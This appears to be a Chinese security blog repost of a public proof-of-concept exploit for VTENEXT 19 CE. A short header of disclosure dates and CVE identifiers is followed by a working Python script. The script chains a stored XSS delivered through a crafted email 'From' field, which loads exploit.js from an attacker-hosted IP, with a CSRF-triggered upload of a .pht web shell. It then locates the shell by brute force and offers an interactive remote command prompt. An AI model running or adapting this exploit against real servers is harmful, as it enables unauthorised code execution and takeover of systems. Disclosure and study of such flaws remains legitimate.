VTENEXT 19 CE-远程执行代码漏洞 —-Hack之路

VTENEXT 19 CE-远程代码执行
#提供作者:马可·鲁埃拉
#供应商主页:https://www.vtenext.com/en/
#软件链接:供应商已从中删除易受攻击的版本sourceforge.net
#版本:19 CE
#测试对象:Ubuntu 16.04
#CVE:不适用

#2020/03/07-向供应商披露的漏洞
#2020/03/10-供应商承诺修复
#2020/09/09-公开披露

#这个脚本应该很容易理解。

#我们把这三个漏洞串联起来得到RCE。

 

#XSS-VTENEXT Messages模块的“From”字段易受攻击。

#文件上载-根据配置文件中的$Upload_badext检查文件扩展名。默认情况下允许并可执行.pht扩展名。

#CSRF-无CSRF保护。

# 漏洞利用.js需要托管在某个地方,IP需要被替换

#check_csrf()应根据您的设置进行更改

#run_shell()是一个“很好拥有”

#内容漏洞利用.js

import smtplib
import datetime
import requests
import os
import time
print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")
def build_url():
    d = datetime.datetime.today()
    year = str(d.year)
    month = str(d.strftime("%B"))
    week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])
    tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"
    return(tmp)
def build_mail():
    _from    = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""
    _to      = "admin@example.com"
    _subject = "Important!"
    _body    = "While you're reading this, a file is being uploaded to this server."
    msg  = "From: " + _from + "\n"
    msg += "To: " + _to + "\n"
    msg += "Subject: " + _subject + "\n\n"
    msg += _body
    return msg
def send_mail():
    msg = build_mail()
    smtp_server = '192.168.226.167'
    smtp_port   = 25
    sender   = 'user1@lab.local'
    receiver = 'admin@lab.local'
    server = smtplib.SMTP(smtp_server, smtp_port)
    server.sendmail(sender, receiver, msg)
def check_csrf():
    while True:
        is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()
        if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:
            print("[>] CSRF triggered")
            break
        else:
            time.sleep(0.5)
            continue
def find_shell():
    print("[>] Locating shell")
    time.sleep(1)
    tmp1 = build_url()
    for i in range(1, 9999):
        url = tmp1 + str(i) + "_shell.pht"
        r = requests.get(url)
        if r.status_code == 200:
            print("[>] Found the shell")
            print("[-] Location: " + url)
            return url
        else:
            continue
def run_shell(x):
    print("\n")
    while True:
        cmd = input("shell> ")
        if cmd == "exit":
            break
        else:
            url = x + "?x=" + cmd
            r = requests.get(url)
            print(r.text)
print("[>] Sending email")
send_mail()
print("[-] Waiting for user to open mail")
check_csrf()
shell_location = find_shell()
run_shell(shell_location)
print("[!] Done!")

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/12/vtenext-19-ce-%e8%bf%9c%e7%a8%8b%e6%89%a7%e8%a1%8c%e4%bb%a3%e7%a0%81%e6%bc%8f%e6%b4%9e-hack%e4%b9%8b%e8%b7%af/

发表评论

邮箱地址不会被公开。 必填项已用*标注